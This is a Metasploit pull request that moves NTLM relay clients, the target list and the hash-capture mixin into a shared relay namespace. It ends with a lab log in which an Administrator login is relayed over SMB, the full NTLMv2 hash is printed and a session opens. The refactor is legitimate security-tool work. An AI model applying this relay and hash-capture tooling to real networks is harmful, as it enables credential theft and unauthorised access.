### PR TITLE
Refactor reusable relay classes out of the SMB directory

### DIFF
--- a/lib/msf/core/exploit/remote/relay/ntlm/hash_capture.rb
+++ b/lib/msf/core/exploit/remote/relay/ntlm/hash_capture.rb
@@ -7,7 +7,7 @@
 require 'ruby_smb'
 
 module Msf
-  module Exploit::Remote::SMB::Server::HashCapture
+  module Exploit::Remote::Relay::NTLM::HashCapture
 
     include ::Msf::Auxiliary::Report
 
@@ -20,7 +20,7 @@ module Msf
         ], self.class)
     end
 
-    def validate_smb_hash_capture_datastore(datastore, ntlm_provider)
+    def validate_hash_capture_datastore(datastore, ntlm_provider)
       if datastore['CHALLENGE']
         # Set challenge for all future server responses
 
@@ -36,7 +36,7 @@ module Msf
       end
     end
 
-    def report_ntlm_type3(address:, ntlm_type1:, ntlm_type2:, ntlm_type3:)
+    def report_ntlm_type3(address:, ntlm_type1:, ntlm_type2:, ntlm_type3:, service_name:)
       ntlm_message = ntlm_type3
       hash_type = nil
 
@@ -69,7 +69,7 @@ module Msf
           {
             address: address,
             port: srvport,
-            service_name: 'smb',
+            service_name: service_name.downcase,
             protocol: 'tcp',
             module_fullname: fullname,
             workspace_id: myworkspace_id
@@ -81,7 +81,7 @@ module Msf
           origin_type: :service,
           address: address,
           port: srvport,
-          service_name: 'smb',
+          service_name: service_name.downcase,
           username: user,
           server_challenge: challenge,
           client_hash: client_hash,
@@ -121,10 +121,12 @@ module Msf
 
       # TODO: write method for mapping +major+ and +minor+ OS values to human-readable OS names.
       # client_os_version = ::NTLM::OSVersion.read(type1_msg.os_version)
-      print_line "[SMB] #{hash_type} Client     : #{address}"
-      # print_line "[SMB] #{hash_type} Client OS  : #{client_os_version}"
-      print_line "[SMB] #{hash_type} Username   : #{domain}\\#{user}"
-      print_line "[SMB] #{hash_type} Hash       : #{combined_hash}"
+
+      protocol_prefix = service_name.upcase
+      print_line "[#{protocol_prefix}] #{hash_type} Client     : #{address}"
+      # print_line "[#{protocol_prefix}] #{hash_type} Client OS  : #{client_os_version}"
+      print_line "[#{protocol_prefix}] #{hash_type} Username   : #{domain}\\#{user}"
+      print_line "[#{protocol_prefix}] #{hash_type} Hash       : #{combined_hash}"
       print_line
 
       if datastore['JOHNPWFILE']
@@ -136,12 +138,13 @@ module Msf
       end
     end
 
-    def on_ntlm_type3(address:, ntlm_type1:, ntlm_type2:, ntlm_type3:)
+    def on_ntlm_type3(address:, ntlm_type1:, ntlm_type2:, ntlm_type3:, service_name:)
       report_ntlm_type3(
         address: address,
         ntlm_type1: ntlm_type1,
         ntlm_type2: ntlm_type2,
-        ntlm_type3: ntlm_type3
+        ntlm_type3: ntlm_type3,
+        service_name: service_name
       )
     end
 
@@ -174,10 +177,11 @@ module Msf
     class HashCaptureNTLMProvider < ::RubySMB::Gss::Provider::NTLM
       # @param [::WindowsError::NTStatus] ntlm_type3_status A specific NT Status to return as the response to the NTLM
       #   type 3 message. If this value is nil, the message will be processed as normal.
-      def initialize(allow_anonymous: false, allow_guests: false, default_domain: 'WORKGROUP', listener: nil, ntlm_type3_status: ::WindowsError::NTStatus::STATUS_ACCESS_DENIED)
+      def initialize(allow_anonymous: false, allow_guests: false, default_domain: 'WORKGROUP', listener: nil, ntlm_type3_status: ::WindowsError::NTStatus::STATUS_ACCESS_DENIED, service_name:)
         super(allow_anonymous: allow_anonymous, allow_guests: allow_guests, default_domain: default_domain)
         @listener = listener
         @ntlm_type3_status = ntlm_type3_status
+        @service_name = service_name
       end
 
       # Needs overwritten to ensure our version of Authenticator is returned
@@ -188,7 +192,7 @@ module Msf
       end
 
       attr_reader :listener
-      attr_accessor :ntlm_type3_status
+      attr_accessor :ntlm_type3_status, :service_name
     end
 
     class HashCaptureAuthenticator < ::RubySMB::Gss::Provider::NTLM::Authenticator
@@ -208,6 +212,7 @@ module Msf
             ntlm_type1: @ntlm_type1,
             ntlm_type2: @ntlm_type2,
             ntlm_type3: type3_msg,
+            service_name: @provider.service_name
           )
         end
 

--- a/lib/msf/core/exploit/remote/relay/ntlm/target.rb
+++ b/lib/msf/core/exploit/remote/relay/ntlm/target.rb
@@ -1,3 +1,3 @@
-module Msf::Exploit::Remote::SMB::Relay::NTLM::Target
+module Msf::Exploit::Remote::Relay::NTLM::Target
   RelayResult = Struct.new(:message, :nt_status, keyword_init: true)
 end

--- a/lib/msf/core/exploit/remote/relay/ntlm/target/http/client.rb
+++ b/lib/msf/core/exploit/remote/relay/ntlm/target/http/client.rb
@@ -1,4 +1,4 @@
-module Msf::Exploit::Remote::SMB::Relay::NTLM::Target::HTTP
+module Msf::Exploit::Remote::Relay::NTLM::Target::HTTP
   # The HTTP Client for interacting with the relayed_target
   class Client
     extend Forwardable
@@ -38,7 +38,7 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM::Target::HTTP
     end
 
     # @param [String] client_type1_msg
-    # @rtype [Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult, nil]
+    # @rtype [Msf::Exploit::Remote::Relay::NTLM::Target::RelayResult, nil]
     def relay_ntlmssp_type1(client_type1_msg)
       req = @client.request_raw(
         'method'  => 'GET',
@@ -65,14 +65,14 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM::Target::HTTP
         return nil
       end
 
-      Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(
+      Msf::Exploit::Remote::Relay::NTLM::Target::RelayResult.new(
         message: Net::NTLM::Message.decode64(res.headers['WWW-Authenticate'].split[1]),
         nt_status: WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED
       )
     end
 
     # @param [String] client_type3_msg
-    # @rtype [Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult, nil]
+    # @rtype [Msf::Exploit::Remote::Relay::NTLM::Target::RelayResult, nil]
     def relay_ntlmssp_type3(client_type3_msg)
       req = @client.request_raw(
         'method'  => 'GET',
@@ -96,7 +96,7 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM::Target::HTTP
       else
         nt_status = WindowsError::NTStatus::STATUS_LOGON_FAILURE
       end
-      Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(nt_status: nt_status)
+      Msf::Exploit::Remote::Relay::NTLM::Target::RelayResult.new(nt_status: nt_status)
     end
 
     def send_recv(req, t = -1, persist = true)

--- a/lib/msf/core/exploit/remote/relay/ntlm/target/ldap/client.rb
+++ b/lib/msf/core/exploit/remote/relay/ntlm/target/ldap/client.rb
@@ -1,6 +1,6 @@
 require 'rex/proto/ldap/auth_adapter'
 
-module Msf::Exploit::Remote::SMB::Relay::NTLM::Target::LDAP
+module Msf::Exploit::Remote::Relay::NTLM::Target::LDAP
   # The LDAP Client for interacting with the relayed_target
   # This isn't actually a Rex::Proto::LDAP::Client instance, but rather a Net::LDAP::Connection instance because of the
   # state requirements of the relay operations
@@ -32,7 +32,7 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM::Target::LDAP
     alias :disconnect! :close
 
     # @param [String] client_type1_msg
-    # @rtype [Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult, nil]
+    # @rtype [Msf::Exploit::Remote::Relay::NTLM::Target::RelayResult, nil]
     def relay_ntlmssp_type1(client_type1_msg)
       ntlm_message = Net::NTLM::Message.parse(client_type1_msg)
       if ntlm_message.has_flag?(:SIGN)
@@ -42,21 +42,21 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM::Target::LDAP
       pdu = bind(method: :rex_relay_ntlm, ntlm_message: client_type1_msg)
 
       unless pdu.result_code == Net::LDAP::ResultCodeSaslBindInProgress
-        return Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(
+        return Msf::Exploit::Remote::Relay::NTLM::Target::RelayResult.new(
           nt_status: WindowsError::NTStatus::STATUS_LOGON_FAILURE
         )
       end
 
       server_type2_message = pdu.result_server_sasl_creds.to_s
 
-      Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(
+      Msf::Exploit::Remote::Relay::NTLM::Target::RelayResult.new(
         message: Net::NTLM::Message.parse(server_type2_message),
         nt_status: WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED
       )
     end
 
     # @param [String] client_type3_msg
-    # @rtype [Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult, nil]
+    # @rtype [Msf::Exploit::Remote::Relay::NTLM::Target::RelayResult, nil]
     def relay_ntlmssp_type3(client_type3_msg)
       ntlm_message = Net::NTLM::Message.parse(client_type3_msg)
       if ntlm_message.ntlm_version == :ntlmv2
@@ -74,7 +74,7 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM::Target::LDAP
         return nil
       end
 
-      Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(nt_status: nt_status)
+      Msf::Exploit::Remote::Relay::NTLM::Target::RelayResult.new(nt_status: nt_status)
     end
 
     # Instantiate a Rex::Proto::LDAP::Client that can be used as a normal LDAP client.

--- a/lib/msf/core/exploit/remote/relay/ntlm/target/mssql/client.rb
+++ b/lib/msf/core/exploit/remote/relay/ntlm/target/mssql/client.rb
@@ -1,4 +1,4 @@
-module Msf::Exploit::Remote::SMB::Relay::NTLM::Target::MSSQL
+module Msf::Exploit::Remote::Relay::NTLM::Target::MSSQL
   class Client < Rex::Proto::MSSQL::Client
     attr_reader :target
 
@@ -22,7 +22,7 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM::Target::MSSQL
 
 
     # @param [String] client_type1_msg
-    # @rtype [Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult, nil]
+    # @rtype [Msf::Exploit::Remote::Relay::NTLM::Target::RelayResult, nil]
     def relay_ntlmssp_type1(client_type1_msg)
       self.initial_connection_info[:prelogin_data] = mssql_prelogin
 
@@ -48,14 +48,14 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM::Target::MSSQL
       resp = mssql_send_recv(pkt, @timeout, false)
       server_type2_message = resp[3..-1]
 
-      Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(
+      Msf::Exploit::Remote::Relay::NTLM::Target::RelayResult.new(
         message: Net::NTLM::Message.parse(server_type2_message),
         nt_status: WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED
       )
     end
 
     # @param [String] client_type3_msg
-    # @rtype [Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult, nil]
+    # @rtype [Msf::Exploit::Remote::Relay::NTLM::Target::RelayResult, nil]
     def relay_ntlmssp_type3(client_type3_msg)
       pkt_hdr = MsTdsHeader.new(
         type: MsTdsType::SSPI_MESSAGE,
@@ -73,7 +73,7 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM::Target::MSSQL
         nt_status = WindowsError::NTStatus::STATUS_LOGON_FAILURE
       end
 
-      Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(nt_status: nt_status)
+      Msf::Exploit::Remote::Relay::NTLM::Target::RelayResult.new(nt_status: nt_status)
     end
 
     protected

--- a/lib/msf/core/exploit/remote/relay/ntlm/target/smb/client.rb
+++ b/lib/msf/core/exploit/remote/relay/ntlm/target/smb/client.rb
@@ -1,11 +1,11 @@
-module Msf::Exploit::Remote::SMB::Relay::NTLM::Target::SMB
+module Msf::Exploit::Remote::Relay::NTLM::Target::SMB
   # The SMB Client for interacting with the relayed_target
   class Client < ::RubySMB::Client
     # The supported server dialects. SMB 1 is not supported:
     # https://github.com/rapid7/metasploit-framework/issues/16261
     # Note there are similar supported dialects for both the server and the relay clients
     # {Msf::Exploit::Remote::SMB::Relay::NTLM::SUPPORTED_SERVER_DIALECTS} and
-    # {Msf::Exploit::Remote::SMB::Relay::NTLM::Target::SMB::Client::SUPPORTED_CLIENT_DIALECTS}
+    # {Msf::Exploit::Remote::Relay::NTLM::Target::SMB::Client::SUPPORTED_CLIENT_DIALECTS}
     SUPPORTED_CLIENT_DIALECTS = [
       RubySMB::Client::SMB2_DIALECT_0202,
       RubySMB::Client::SMB2_DIALECT_0210,
@@ -59,7 +59,7 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM::Target::SMB
     end
 
     # @param [String] client_type1_msg
-    # @rtype [Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult, nil]
+    # @rtype [Msf::Exploit::Remote::Relay::NTLM::Target::RelayResult, nil]
     def relay_ntlmssp_type1(client_type1_msg)
       @version = negotiate
 
@@ -100,8 +100,7 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM::Target::SMB
 
         @session_id = server_type2_pkt.smb2_header.session_id
         type2_ntlm_message = smb2_type2_message(server_type2_pkt)
-
-        Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(
+        Msf::Exploit::Remote::Relay::NTLM::Target::RelayResult.new(
           message: Net::NTLM::Message.decode64(type2_ntlm_message),
           nt_status: WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED
         )
@@ -114,7 +113,7 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM::Target::SMB
     end
 
     # @param [String] client_type3_msg
-    # @rtype [Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult, nil]
+    # @rtype [Msf::Exploit::Remote::Relay::NTLM::Target::RelayResult, nil]
     def relay_ntlmssp_type3(client_type3_msg)
       if @version == 'SMB1'
         # TODO: SMB1 not supported
@@ -141,7 +140,7 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM::Target::SMB
           @session_encrypt_data = true
         end
 
-        Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(
+        Msf::Exploit::Remote::Relay::NTLM::Target::RelayResult.new(
           nt_status: WindowsError::NTStatus.find_by_retval(response.smb2_header.nt_status.value).first
         )
       end

--- a/lib/msf/core/exploit/remote/relay/target_list.rb
+++ b/lib/msf/core/exploit/remote/relay/target_list.rb
@@ -1,6 +1,6 @@
 require 'rex/socket'
 
-module Msf::Exploit::Remote::SMB::Relay
+module Msf::Exploit::Remote::Relay
   # A thread safe target list. The provided targets will be iterated over via the {next} method.
   class TargetList
     include MonitorMixin

--- a/lib/msf/core/exploit/remote/smb/relay/ntlm/server.rb
+++ b/lib/msf/core/exploit/remote/smb/relay/ntlm/server.rb
@@ -7,8 +7,8 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM
     # The supported server dialects. SMB 1 is allowed, so that it can be reported as a failure to the user
     # https://github.com/rapid7/metasploit-framework/issues/16261
     # Note there are similar supported dialects for both the server and the relay clients
-    # {Msf::Exploit::Remote::SMB::Relay::NTLM::SUPPORTED_SERVER_DIALECTS} and
-    # {Msf::Exploit::Remote::SMB::Relay::NTLM::Target::SMB::Client::SUPPORTED_CLIENT_DIALECTS}
+    # {Msf::Exploit::Remote::SMB::Relay::NTLM::Server::SUPPORTED_SERVER_DIALECTS} and
+    # {Msf::Exploit::Remote::Relay::NTLM::Target::SMB::Client::SUPPORTED_CLIENT_DIALECTS}
     SUPPORTED_SERVER_DIALECTS = [
       RubySMB::Client::SMB1_DIALECT_SMB1_DEFAULT,
 

--- a/lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb
+++ b/lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb
@@ -7,7 +7,7 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM
     # The NT Status that will cause a client to reattempt authentication
     FORCE_RETRY_SESSION_SETUP = ::WindowsError::NTStatus::STATUS_NETWORK_SESSION_EXPIRED
 
-    # @param [Msf::Exploit::Remote::SMB::Relay::TargetList] relay_targets Relay targets
+    # @param [Msf::Exploit::Remote::Relay::TargetList] relay_targets Relay targets
     # @param [Object] listener A listener that can receive on_relay_success/on_relay_failure events
     def initialize(server, dispatcher, relay_timeout:, relay_targets:, listener:)
       super(server, dispatcher)
@@ -284,13 +284,13 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM
     def create_relay_client(target, timeout)
       case target.protocol
       when :http, :https
-        client = Target::HTTP::Client.create(self, target, logger, timeout)
+        client = Msf::Exploit::Remote::Relay::NTLM::Target::HTTP::Client.create(self, target, logger, timeout)
       when :smb
-        client = Target::SMB::Client.create(self, target, logger, timeout)
+        client = Msf::Exploit::Remote::Relay::NTLM::Target::SMB::Client.create(self, target, logger, timeout)
       when :ldap
-        client = Target::LDAP::Client.create(self, target, logger, timeout)
+        client = Msf::Exploit::Remote::Relay::NTLM::Target::LDAP::Client.create(self, target, logger, timeout)
       when :mssql
-        client = Target::MSSQL::Client.create(self, target, logger, timeout, framework_module: @listener)
+        client = Msf::Exploit::Remote::Relay::NTLM::Target::MSSQL::Client.create(self, target, logger, timeout, framework_module: @listener)
       else
         raise RuntimeError, "unsupported protocol: #{target.protocol}"
       end

--- a/lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb
+++ b/lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb
@@ -249,7 +249,8 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM
             address: relayed_connection.target.ip,
             ntlm_type1: session.metadata[:incoming_negotiate_message],
             ntlm_type2: session.metadata[:relay_target_server_challenge],
-            ntlm_type3: session.metadata[:incoming_challenge_response]
+            ntlm_type3: session.metadata[:incoming_challenge_response],
+            service_name: 'SMB'
           )
           @listener.on_relay_success(relay_connection: relayed_connection, relay_identity: session.metadata[:identity])
         else

--- a/lib/msf/core/exploit/remote/smb/relay_server.rb
+++ b/lib/msf/core/exploit/remote/smb/relay_server.rb
@@ -6,7 +6,7 @@ module Msf
     module RelayServer
       include ::Msf::Auxiliary::MultipleTargetHosts
       include ::Msf::Exploit::Remote::SocketServer
-      include ::Msf::Exploit::Remote::SMB::Server::HashCapture
+      include ::Msf::Exploit::Remote::Relay::NTLM::HashCapture
 
       def initialize(info = {})
         super
@@ -115,7 +115,7 @@ module Msf
         ntlm_provider.netbios_domain = datastore['SMBDomain']
         ntlm_provider.netbios_hostname = datastore['SMBDomain']
 
-        validate_smb_hash_capture_datastore(datastore, ntlm_provider)
+        validate_hash_capture_datastore(datastore, ntlm_provider)
 
         comm = _determine_server_comm(bindhost)
         @service = Rex::ServiceManager.start(

--- a/lib/msf/core/exploit/remote/smb/server/share.rb
+++ b/lib/msf/core/exploit/remote/smb/server/share.rb
@@ -7,7 +7,7 @@ module Msf
     # live in the root folder "\\".
     module Share
       include ::Msf::Exploit::Remote::SMB::Server
-      include ::Msf::Exploit::Remote::SMB::Server::HashCapture
+      include ::Msf::Exploit::Remote::Relay::NTLM::HashCapture
 
       # @!attribute share
       #   @return [String] The share portion of the provided UNC.
@@ -41,11 +41,12 @@ module Msf
 
       def start_service(opts = {})
         unless opts[:gss_provider]
-          ntlm_provider = Msf::Exploit::Remote::SMB::Server::HashCapture::HashCaptureNTLMProvider.new(
+          ntlm_provider = Msf::Exploit::Remote::Relay::NTLM::HashCapture::HashCaptureNTLMProvider.new(
             allow_anonymous: true,
             allow_guests: true,
             listener: self,
-            ntlm_type3_status: nil
+            ntlm_type3_status: nil,
+            service_name: 'SMB'
           )
 
           # Set domain name for all future server responses

--- a/lib/msf/core/payload/adapter/fetch/server/smb.rb
+++ b/lib/msf/core/payload/adapter/fetch/server/smb.rb
@@ -1,7 +1,7 @@
 module Msf::Payload::Adapter::Fetch::Server::SMB
 
   include ::Msf::Exploit::Remote::SMB::LogAdapter
-  include ::Msf::Exploit::Remote::SMB::Server::HashCapture
+  include ::Msf::Exploit::Remote::Relay::NTLM::HashCapture
 
   def start_smb_server(srvport, srvhost)
     vprint_status("Starting SMB server on #{Rex::Socket.to_authority(srvhost, srvport)}")
@@ -9,11 +9,12 @@ module Msf::Payload::Adapter::Fetch::Server::SMB
     log_device = LogDevice::Framework.new(framework)
     logger = Logger.new(self, log_device)
 
-    ntlm_provider = Msf::Exploit::Remote::SMB::Server::HashCapture::HashCaptureNTLMProvider.new(
+    ntlm_provider = Msf::Exploit::Remote::Relay::NTLM::HashCapture::HashCaptureNTLMProvider.new(
       allow_anonymous: true,
       allow_guests: true,
       listener: self,
-      ntlm_type3_status: nil
+      ntlm_type3_status: nil,
+      service_name: 'SMB'
     )
 
     fetch_service = Rex::ServiceManager.start(

--- a/modules/auxiliary/fileformat/environment_variable_datablock_leak.rb
+++ b/modules/auxiliary/fileformat/environment_variable_datablock_leak.rb
@@ -9,7 +9,7 @@ class MetasploitModule < Msf::Auxiliary
 
   include Msf::Exploit::FILEFORMAT
   include Msf::Exploit::Remote::SMB::Server::Share
-  include Msf::Exploit::Remote::SMB::Server::HashCapture
+  include Msf::Exploit::Remote::Relay::NTLM::HashCapture
 
   def initialize(info = {})
     super(

--- a/modules/auxiliary/fileformat/icon_environment_datablock_leak.rb
+++ b/modules/auxiliary/fileformat/icon_environment_datablock_leak.rb
@@ -9,7 +9,7 @@ class MetasploitModule < Msf::Auxiliary
 
   include Msf::Exploit::FILEFORMAT
   include Msf::Exploit::Remote::SMB::Server::Share
-  include Msf::Exploit::Remote::SMB::Server::HashCapture
+  include Msf::Exploit::Remote::Relay::NTLM::HashCapture
 
   def initialize(info = {})
     super(

--- a/modules/auxiliary/fileformat/specialfolder_leak.rb
+++ b/modules/auxiliary/fileformat/specialfolder_leak.rb
@@ -8,7 +8,7 @@ class MetasploitModule < Msf::Auxiliary
 
   include Msf::Exploit::FILEFORMAT
   include Msf::Exploit::Remote::SMB::Server::Share
-  include Msf::Exploit::Remote::SMB::Server::HashCapture
+  include Msf::Exploit::Remote::Relay::NTLM::HashCapture
 
   def initialize(info = {})
     super(

--- a/modules/auxiliary/server/capture/smb.rb
+++ b/modules/auxiliary/server/capture/smb.rb
@@ -8,7 +8,7 @@ require 'ruby_smb/gss/provider/ntlm'
 
 class MetasploitModule < Msf::Auxiliary
   include ::Msf::Exploit::Remote::SMB::Server
-  include ::Msf::Exploit::Remote::SMB::Server::HashCapture
+  include ::Msf::Exploit::Remote::Relay::NTLM::HashCapture
 
   def initialize
     super({
@@ -64,7 +64,8 @@ class MetasploitModule < Msf::Auxiliary
 
   def start_service(opts = {})
     ntlm_provider = HashCaptureNTLMProvider.new(
-      listener: self
+      listener: self,
+      service_name: 'SMB'
     )
 
     # Set domain name for all future server responses
@@ -72,7 +73,7 @@ class MetasploitModule < Msf::Auxiliary
     ntlm_provider.dns_hostname = datastore['SMBDomain']
     ntlm_provider.netbios_domain = datastore['SMBDomain']
     ntlm_provider.netbios_hostname = datastore['SMBDomain']
-    validate_smb_hash_capture_datastore(datastore, ntlm_provider)
+    validate_hash_capture_datastore(datastore, ntlm_provider)
     opts[:gss_provider] = ntlm_provider
 
     super(opts)

--- a/modules/auxiliary/server/relay/esc8.rb
+++ b/modules/auxiliary/server/relay/esc8.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def relay_targets
-    Msf::Exploit::Remote::SMB::Relay::TargetList.new(
+    Msf::Exploit::Remote::Relay::TargetList.new(
       (datastore['SSL'] ? :https : :http),
       datastore['RPORT'],
       datastore['RHOSTS'],

--- a/modules/auxiliary/server/relay/relay_get_naa_credentials.rb
+++ b/modules/auxiliary/server/relay/relay_get_naa_credentials.rb
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def relay_targets
-    Msf::Exploit::Remote::SMB::Relay::TargetList.new(
+    Msf::Exploit::Remote::Relay::TargetList.new(
       (datastore['SSL'] ? :https : :http),
       datastore['RPORT'],
       datastore['RELAY_TARGETS'],

--- a/modules/auxiliary/server/relay/smb_to_ldap.rb
+++ b/modules/auxiliary/server/relay/smb_to_ldap.rb
@@ -62,7 +62,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def relay_targets
-    Msf::Exploit::Remote::SMB::Relay::TargetList.new(
+    Msf::Exploit::Remote::Relay::TargetList.new(
       :ldap, # TODO: look into LDAPs
       datastore['RPORT'],
       datastore['RHOSTS'],
@@ -96,7 +96,7 @@ class MetasploitModule < Msf::Auxiliary
     elog('Failed to setup the session', error: e)
   end
 
-  # @param [Msf::Exploit::Remote::SMB::Relay::NTLM::Target::LDAP::Client] relay_connection
+  # @param [Msf::Exploit::Remote::Relay::NTLM::Target::LDAP::Client] relay_connection
   # @return [Msf::Sessions::LDAP]
   def session_setup(relay_connection, relay_identity)
     client = relay_connection.create_ldap_client

--- a/modules/auxiliary/server/relay/smb_to_mssql.rb
+++ b/modules/auxiliary/server/relay/smb_to_mssql.rb
@@ -54,7 +54,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def relay_targets
-    Msf::Exploit::Remote::SMB::Relay::TargetList.new(
+    Msf::Exploit::Remote::Relay::TargetList.new(
       :mssql,
       datastore['RPORT'],
       datastore['RHOSTS'],
@@ -86,7 +86,7 @@ class MetasploitModule < Msf::Auxiliary
     elog('Failed to setup the session', error: e)
   end
 
-  # @param [Msf::Exploit::Remote::SMB::Relay::NTLM::Target::MSSQL::Client] relay_connection
+  # @param [Msf::Exploit::Remote::Relay::NTLM::Target::MSSQL::Client] relay_connection
   # @return [Msf::Sessions::MSSQL]
   def session_setup(relay_connection, relay_identity)
     mssql_session = Msf::Sessions::MSSQL.new(

--- a/modules/exploits/windows/fileformat/unc_url_cve_2025_33053.rb
+++ b/modules/exploits/windows/fileformat/unc_url_cve_2025_33053.rb
@@ -7,7 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::SMB::Server::Share
-  include Msf::Exploit::Remote::SMB::Server::HashCapture
+  include Msf::Exploit::Remote::Relay::NTLM::HashCapture
   include Msf::Exploit::FILEFORMAT
   include Msf::Exploit::EXE
 

--- a/modules/exploits/windows/smb/smb_relay.rb
+++ b/modules/exploits/windows/smb/smb_relay.rb
@@ -210,7 +210,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def relay_targets
-    Msf::Exploit::Remote::SMB::Relay::TargetList.new(
+    Msf::Exploit::Remote::Relay::TargetList.new(
       :smb,
       rport,
       datastore['RHOSTS'],

--- a/spec/lib/msf/exploit/remote/smb/relay/target_list_spec.rb
+++ b/spec/lib/msf/exploit/remote/smb/relay/target_list_spec.rb
@@ -1,7 +1,7 @@
 require 'rspec'
-require 'msf/core/exploit/remote/smb/relay/target_list'
+require 'msf/core/exploit/remote/relay/target_list'
 
-RSpec.describe Msf::Exploit::Remote::SMB::Relay::TargetList do
+RSpec.describe Msf::Exploit::Remote::Relay::TargetList do
   let(:subject) { described_class.new :smb, 445,'192.0.2.1 192.0.2.2 192.0.2.3', randomize_targets: false }
   let(:user_one) { 'domain/one' }
   let(:user_two) { 'domain/two' }


### PR DESCRIPTION
There were a number of classes that were originally placed inside:`lib/msf/core/exploit/remote/smb/relay/` which made sense at the time when the framework could only relay from smb to other protocols. 

As a part of the effort to expand the framework's relay capability, this PR moves a number of these classes to their new home: `lib/msf/core/exploit/remote/relay/` so they can eventually be used by the incoming `http_to_ldap` relay module. 

The majority of the classes being moved are the NTLM target clients (http, ldap, mssql and smb), these clients get passed NTLMv1 and NTLMv3 blobs to be relayed and aren't concerned with what protocol those blobs originated from. The TargetList class is also being moved. The rest of the changes are just updated the name spaces of where these classes are called from. 

## Refactor Testing
### smb_relay
```
msf exploit(windows/smb/smb_relay) > [*] 172.16.199.200:445 - SMB Server is running. Listening on 0.0.0.0:445
[*] 172.16.199.200:445 - Server started.
[*] 172.16.199.200:445 - New request from 172.16.199.137
I, [2026-03-25T13:37:22.923353 #78580]  INFO -- : Starting thread for connection from 172.16.199.137
I, [2026-03-25T13:37:22.943166 #78580]  INFO -- : Negotiated dialect: SMB v2.0.2
D, [2026-03-25T13:37:22.946648 #78580] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: nil)
D, [2026-03-25T13:37:22.951784 #78580] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 206753597, user_id: nil, state: :in_progress>)
I, [2026-03-25T13:37:22.953941 #78580]  INFO -- : NTLM authentication request overridden to succeed for \Administrator
D, [2026-03-25T13:37:22.957731 #78580] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 206753597, user_id: "\\Administrator", state: :valid>)
[*] 172.16.199.200:445 - Received request for \Administrator
[*] 172.16.199.200:445 - Relaying to next target smb://172.16.199.200:445
D, [2026-03-25T13:37:22.968969 #78580] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 206753597, user_id: "\\Administrator", state: :in_progress>)
I, [2026-03-25T13:37:22.970143 #78580]  INFO -- : Relaying NTLM type 1 message to smb://172.16.199.200:445 (Always Sign: true, Sign: true, Seal: false)
D, [2026-03-25T13:37:22.991576 #78580] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 206753597, user_id: "\\Administrator", state: :in_progress>)
I, [2026-03-25T13:37:23.000528 #78580]  INFO -- : Relaying NTLMv2 type 3 message to smb://172.16.199.200:445 as \Administrator
[+] 172.16.199.200:445 - Identity: \Administrator - Successfully authenticated against relay target smb://172.16.199.200:445
[SMB] NTLMv2-SSP Client     : 172.16.199.200
[SMB] NTLMv2-SSP Username   : \Administrator
[SMB] NTLMv2-SSP Hash       : Administrator:::bb2e98154016431b:c9604b42cbba949a909768548a9e7cbd:010100000000000059820c2f97bcdc01afa639e9f06c7e8400000000020010004b00450052004200450052004f0053000100060044004300320004001c006b00650072006200650072006f0073002e0069007300730075006500030024006400630032002e006b00650072006200650072006f0073002e006900730073007500650005001c006b00650072006200650072006f0073002e00690073007300750065000700080059820c2f97bcdc0106000400020000000800300030000000000000000000000000300000e7c4c66ded8cbd6c6939c39a150d2fc7dfb6a9d4f5a49074238541a4dfa08c9e0a001000000000000000000000000000000000000900220063006900660073002f003100370032002e00310036002e003100390039002e0031000000000000000000

[*] SMB session 9 opened (172.16.199.1:57516 -> 172.16.199.200:445) at 2026-03-25 13:37:43 -0700
